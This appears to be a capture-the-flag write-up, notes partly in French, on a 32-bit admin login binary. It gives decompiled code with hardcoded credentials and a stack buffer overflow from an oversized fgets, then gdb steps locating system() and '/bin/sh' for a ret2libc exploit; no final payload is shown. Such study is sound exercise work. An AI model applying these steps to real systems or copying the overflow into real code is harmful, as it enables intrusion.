HEX RAYS :

//----- (08048464) --------------------------------------------------------
_BOOL4 verify_user_name()
{
  puts("verifying username....\n");
  return memcmp(a_user_name, "dat_wil", 7u) != 0;
}

//----- (080484A3) --------------------------------------------------------
_BOOL4 __cdecl verify_user_pass(const void *a1)
{
  return memcmp(a1, "admin", 5u) != 0;
}

//----- (080484D0) --------------------------------------------------------
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[64]; // [esp+1Ch] [ebp-4Ch] BYREF
  _BOOL4 v5; // [esp+5Ch] [ebp-Ch]

  memset(s, 0, sizeof(s));
  v5 = 0;
  puts("********* ADMIN LOGIN PROMPT *********");
  printf("Enter Username: ");
  fgets(a_user_name, 256, stdin);
  v5 = verify_user_name();
  if ( v5 )
  {
    puts("nope, incorrect username...\n");
  }
  else
  {
    puts("Enter Password: ");
    fgets(s, 100, stdin);
    v5 = verify_user_pass(s);
    puts("nope, incorrect password...\n");
  }
  return 1;
}

Faire des tests avec des suites de caracteres (pour username, commencer par "dat_wil")  

On repere l''adresse de la globale user_name : 
- Dans le code ASM pour le premier fgets:
  0x08048521 <+81>:	mov    DWORD PTR [esp],0x804a040
  0x08048528 <+88>:	call   0x8048370 <fgets@plt>
- Ou grace a info variables:
  (gdb) info variable a_user_name
  All variables matching regular expression "a_user_name":
  Non-debugging symbols:
  0x0804a040  a_user_name
On checke avec AAAA dans le user_name:
  (gdb) x/4s 0x0804a040
  0x804a040 <a_user_name>:	 "AAAAAAAA\n"

ret2libc
// On repere l'adresse de system()
(gdb) p system
$17 = {<text variable, no debug info>} 0xf7e6aed0 <system>
// On repere la chaine /bin/sh
(gdb) find __libc_start_main,+99999999,"/bin/sh"
0xf7f897ec          <--------------------------
warning: Unable to access target memory at 0xf7fd3b74, halting search.
1 pattern found.

